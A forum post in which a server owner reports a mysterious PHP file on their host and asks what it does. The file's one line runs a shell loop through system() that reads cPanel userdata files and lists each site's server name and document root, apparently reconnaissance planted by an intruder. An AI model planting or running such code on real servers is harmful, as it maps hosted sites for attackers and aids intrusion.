Hello, yesterday a mysterious file appeared on my server - sadfsdfsdf.php. The host says they dont know anything about how it happened but I dont trust them because their customer service is really bad. The content of the file is:
<?PHP echo system('FILES=/var/cpanel/userdata/myusernamehere/*;for i in $FILES;do egrep "servername|documentroot" $i | awk \'{print $1,$2}\' | egrep "^servername|^documentroot";echo ;done'); ?>
Can anyone translate what this code means? Many thanks!